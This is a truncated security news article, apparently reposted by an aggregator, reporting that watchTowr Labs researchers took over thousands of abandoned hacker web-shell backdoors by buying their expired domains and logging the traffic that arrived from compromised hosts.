Shadow IT has long been a pressing concern for Chief Information Security Officers (CISOs). Forgotten systems, infrastructure, or hardware connected to enterprise networks often resurface as entry points for data breaches or compromises years later. However, new findings from watchTowr Labs reveal that this issue extends beyond enterprise networks, offering a unique opportunity to exploit the sloppy practices of malicious hackers themselves.
In a recent post, watchTowr Labs CEO Benjamin Harris and researcher Aliz Hammond unveiled their discovery of thousands of live backdoors used by hackers, accessed through abandoned infrastructure and expired domains.
“Put simply — we have been hijacking backdoors (that were reliant on now-abandoned infrastructure and/or expired domains) that themselves existed inside backdoors, and have since been watching the results flood in,” Harris and Hammond wrote.
Their method involved identifying and purchasing expired domains — often costing as little as $20 — linked to older web shells. By redirecting these domains to their logging server, the team tracked incoming traffic from compromised hosts.
Among the attackers’ missteps were unprotected or poorly secured web shells, many of which contained code that enabled researche
[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.
[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.
This article has been indexed from CySecurity News – Latest Information Security and Hacking Incidents
Read the original article: